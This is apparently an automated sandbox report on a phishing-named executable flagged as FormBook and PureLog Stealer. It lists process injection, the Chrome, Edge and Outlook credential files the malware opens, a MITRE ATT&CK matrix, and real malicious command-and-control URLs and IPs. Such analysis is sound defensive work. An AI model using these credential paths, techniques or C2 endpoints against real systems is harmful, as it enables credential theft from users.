                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exeProcess created: C:\Windows\SysWOW64\Utilman.exe "C:\Windows\SysWOW64\Utilman.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215883797.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4560346225.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000000.2367935044.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                      Source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215883797.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4560346225.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000000.2367935044.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215883797.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4560346225.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000000.2367935044.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: oDhSPGbJgMIIvl.exe, 00000006.00000000.2215883797.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000006.00000002.4560346225.0000000001000000.00000002.00000001.00040000.00000000.sdmp, oDhSPGbJgMIIvl.exe, 00000009.00000000.2367935044.00000000011B0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeQueries volume information: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4561456919.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2292332224.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4561622867.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.4563177809.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4560972615.00000000026E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2294192340.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ORDER REF 47896798 PSMCO.exe.40f9970.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2127145290.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2123760406.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\Utilman.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.ORDER REF 47896798 PSMCO.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4561456919.0000000004F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2292332224.0000000001DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4561622867.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.4563177809.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2290414447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4560972615.00000000026E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2294192340.0000000001E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ORDER REF 47896798 PSMCO.exe.5a90000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.ORDER REF 47896798 PSMCO.exe.40f9970.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2127145290.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2123760406.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		412
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		11
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585942 Sample: ORDER REF 47896798 PSMCO.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 35 www.solidf.xyz 2->35 37 www.laduta.xyz 2->37 39 15 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Antivirus detection for URL or domain 2->49 51 Antivirus / Scanner detection for submitted sample 2->51 55 11 other signatures 2->55 10 ORDER REF 47896798 PSMCO.exe 4 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 37->53 process4 file5 33 C:\Users\...\ORDER REF 47896798 PSMCO.exe.log, ASCII 10->33 dropped 67 Adds a directory exclusion to Windows Defender 10->67 69 Injects a PE file into a foreign processes 10->69 14 ORDER REF 47896798 PSMCO.exe 10->14         started        17 powershell.exe 23 10->17         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 19 oDhSPGbJgMIIvl.exe 14->19 injected 75 Loading BitLocker PowerShell Module 17->75 22 conhost.exe 17->22         started        process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 19->57 24 Utilman.exe 13 19->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 oDhSPGbJgMIIvl.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 www.cruycq.info 47.83.1.90, 49981, 49982, 49983 VODANETInternationalIP-BackboneofVodafoneDE United States 27->41 43 itcomp.store 103.247.11.204, 50009, 50010, 50011 RUMAHWEB-AS-IDRumahwebIndonesiaCVID Indonesia 27->43 45 8 other IPs or domains 27->45 71 Found direct / indirect Syscall (likely to bypass EDR) 27->71 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ORDER REF 47896798 PSMCO.exe49%VirustotalBrowse
                      ORDER REF 47896798 PSMCO.exe53%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      ORDER REF 47896798 PSMCO.exe100%AviraHEUR/AGEN.1309493
                      ORDER REF 47896798 PSMCO.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.aihuzhibo.net/template/news/wandoujia/static/picture/anva-zilv.png0%Avira URL Cloudsafe
                      http://www.dayizhibo.net0%Avira URL Cloudsafe
                      http://www.maituzhibo.com0%Avira URL Cloudsafe
                      http://www.canaille.net0%Avira URL Cloudsafe
                      http://www.microprinting.net0%Avira URL Cloudsafe
                      http://www.bolezhibo.net0%Avira URL Cloudsafe
                      http://www.feizhibo.net0%Avira URL Cloudsafe
                      http://www.kanniuzhibo.net0%Avira URL Cloudsafe
                      http://www.assetsecurity.net0%Avira URL Cloudsafe
                      http://www.xinxiangzhibo.net0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/rdtl/?T4OdNH=ZOY+qajotO8Y54RWsMlJRfAzJROg7M0EIy2xGwNHpdBqbD/KLW5LjtA9XnFn7YFdiYP1wWcAq05pnCTjdSlGxG6S3f6vZO/FXf/kuh5YN7SlcCVE00CSvDbDDRrbh0G7SoDKmOo=&r4=tP5HWLt8wXstw4H0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js0%Avira URL Cloudsafe
                      http://www.f5jh81t3k1w8.sbs/cu07/100%Avira URL Cloudmalware
                      http://www.deadshoy.tech/m5bf/0%Avira URL Cloudsafe
                      http://www.shenqizhibo.net/binding0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/rdtl/0%Avira URL Cloudsafe
                      http://www.nvdizhibo.com0%Avira URL Cloudsafe
                      http://www.jianhuozhibo.net/binding0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/bl.js0%Avira URL Cloudsafe
                      http://www.liuhuazhibo.net0%Avira URL Cloudsafe
                      http://www.smartdna.net0%Avira URL Cloudsafe
                      http://www.neoparty.sbs/qc6u/0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/realNameAuth.js0%Avira URL Cloudsafe
                      http://www.mosorehlable.online/9bhq/?T4OdNH=E1KWPzuDUrXzeIr+MheblCNEP6GOTx17RfcrRTPFJ37rektGz/Z4QpsAgIJ1fke2ZLjhPbUfcs2Q2jBDnmdO4FnF2DWbeyRHVN+LoHOctdylDUorIjBcKbLwehehFJbE7gRrWpM=&r4=tP5HWLt8wXstw4H0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/broadcast.js0%Avira URL Cloudsafe
                      http://www.jiujiuzhibo.net0%Avira URL Cloudsafe
                      http://www.electroplate.net0%Avira URL Cloudsafe
                      http://www.nkdc.net0%Avira URL Cloudsafe
                      http://www.pessoas.net0%Avira URL Cloudsafe
                      http://www.duoxiuzhibo.com0%Avira URL Cloudsafe
                      https://white.anva.org.cn/0%Avira URL Cloudsafe
                      http://www.dayizhibo.com0%Avira URL Cloudsafe
                      https://zzlz.gsxt.gov.cn/0%Avira URL Cloudsafe
                      http://www.liuhuazhibo.com0%Avira URL Cloudsafe
                      http://www.londonatnight.coffee/13to/0%Avira URL Cloudsafe
                      http://www.laduta.xyz/5mxq/0%Avira URL Cloudsafe
                      http://www.equipar.net0%Avira URL Cloudsafe
                      http://www.simplystudy.net0%Avira URL Cloudsafe
                      http://www.huayuzhibo.net0%Avira URL Cloudsafe
                      http://www.xinglianzhibo.net0%Avira URL Cloudsafe
                      http://www.designclass.net0%Avira URL Cloudsafe
                      http://www.lihuazhibo.net0%Avira URL Cloudsafe
                      http://www.naixizhibo.com0%Avira URL Cloudsafe
                      http://www.easygram.net0%Avira URL Cloudsafe
                      http://www.yanyuzhibo.com0%Avira URL Cloudsafe
                      http://www.69meinvzhibo.net0%Avira URL Cloudsafe
                      http://www.yingzhuzhibo.net0%Avira URL Cloudsafe
                      http://www.bachazhibo.net0%Avira URL Cloudsafe
                      http://www.2023kuanmeiyingzhibo.com0%Avira URL Cloudsafe
                      https://parking.reg.ru/script/get_domain_data?domain_name=www.mosorehlable.online&rand=0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/common.fe363a40.js0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png0%Avira URL Cloudsafe
                      http://www.minizhibo.com0%Avira URL Cloudsafe
                      http://www.yujiezhibo.com0%Avira URL Cloudsafe
                      http://www.salmagundi.net0%Avira URL Cloudsafe
                      http://www.parentwise.net0%Avira URL Cloudsafe
                      http://www.forsyte.net0%Avira URL Cloudsafe
                      http://www.qinglaizhibo.net0%Avira URL Cloudsafe
                      https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/picture/qr-4_httpswww.wandoujia.comqr.png0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js0%Avira URL Cloudsafe
                      http://www.gesichtspflege.net0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net0%Avira URL Cloudsafe
                      http://www.deadshoy.tech/m5bf/?T4OdNH=FKbczbLQ0sosfCA1qCrPSRQ7VsQywqY/pLAdnJ/+09co5PW+cyiO7Vblbf5B8jAN4N3DOHH6+lmh0DtSmFnRLbtcPKmyFQ0Njr8nYR2PceIb1tebNbsHFqS/Z3HN1OVssaooHgA=&r4=tP5HWLt8wXstw4H0%Avira URL Cloudsafe
                      http://www.lianyizhibo.net0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/pullup.js0%Avira URL Cloudsafe
                      https://laduta.xyz/5mxq?T4OdNH=iO94RS5UfBQ5HC0%Avira URL Cloudsafe
                      http://www.losbravos.net0%Avira URL Cloudsafe
                      http://www.mosorehlable.online/9bhq/0%Avira URL Cloudsafe
                      http://www.shareyourlove.net0%Avira URL Cloudsafe
                      http://www.kanbzhibo.net0%Avira URL Cloudsafe
                      http://www.naturalelement.net0%Avira URL Cloudsafe
                      https://companies.rbc.ru/0%Avira URL Cloudsafe
                      http://www.salesa.net0%Avira URL Cloudsafe
                      http://www.3xzhibo.net0%Avira URL Cloudsafe
                      http://www.xiuchangzhibo.net0%Avira URL Cloudsafe
                      http://www.f5jh81t3k1w8.sbs/cu07/?T4OdNH=91PbMFSFbRabMZnMSUj76NvR/Zd0MhT8JKpW4EQcOk8mlMTVcdIaqQPrq3FRSR+owpFtRocVxvjr424E5RpVHJgZhbFN+EtYqaINmBGTcL2VcGMzu+tmB3TsTAvOn48cudhpsmM=&r4=tP5HWLt8wXstw4H100%Avira URL Cloudmalware
                      http://www.anxinzhibo.com0%Avira URL Cloudsafe
                      http://www.souyouzhibo.net0%Avira URL Cloudsafe
                      http://www.aihuzhibo.net/template/news/wandoujia/static/js/nc.js0%Avira URL Cloudsafe
                      http://www.cruycq.info/6jon/?r4=tP5HWLt8wXstw4H&T4OdNH=lY14yI5fwZOcgUQUpnTLlx+QJBfbC4DwEOc7MQQgkkxJhrqVuxiq0TqPiA2X0dq4ve8sLU4ITp6q3cu8oZorZNmhdsAOEHd31HcaUahVOt7Sj+u/MvofX8Uu67Ih0HTVKoUtY2c=0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.aihuzhibo.net
                      		192.186.58.31
                      		truetrue
                        		unknown
                        www.solidf.xyz
                        		199.192.21.169
                        		truetrue
                          		unknown
                          www.laduta.xyz
                          		192.64.119.109
                          		truetrue
                            		unknown
                            www.deadshoy.tech
                            		199.59.243.228
                            		truetrue
                              		unknown
                              www.londonatnight.coffee
                              		13.248.169.48
                              		truetrue
                                		unknown
                                www.neoparty.sbs
                                		104.21.53.168
                                		truetrue
                                  		unknown
                                  itcomp.store
                                  		103.247.11.204
                                  		truetrue
                                    		unknown
                                    www.mosorehlable.online
                                    		194.58.112.174
                                    		truetrue
                                      		unknown
                                      www.f5jh81t3k1w8.sbs
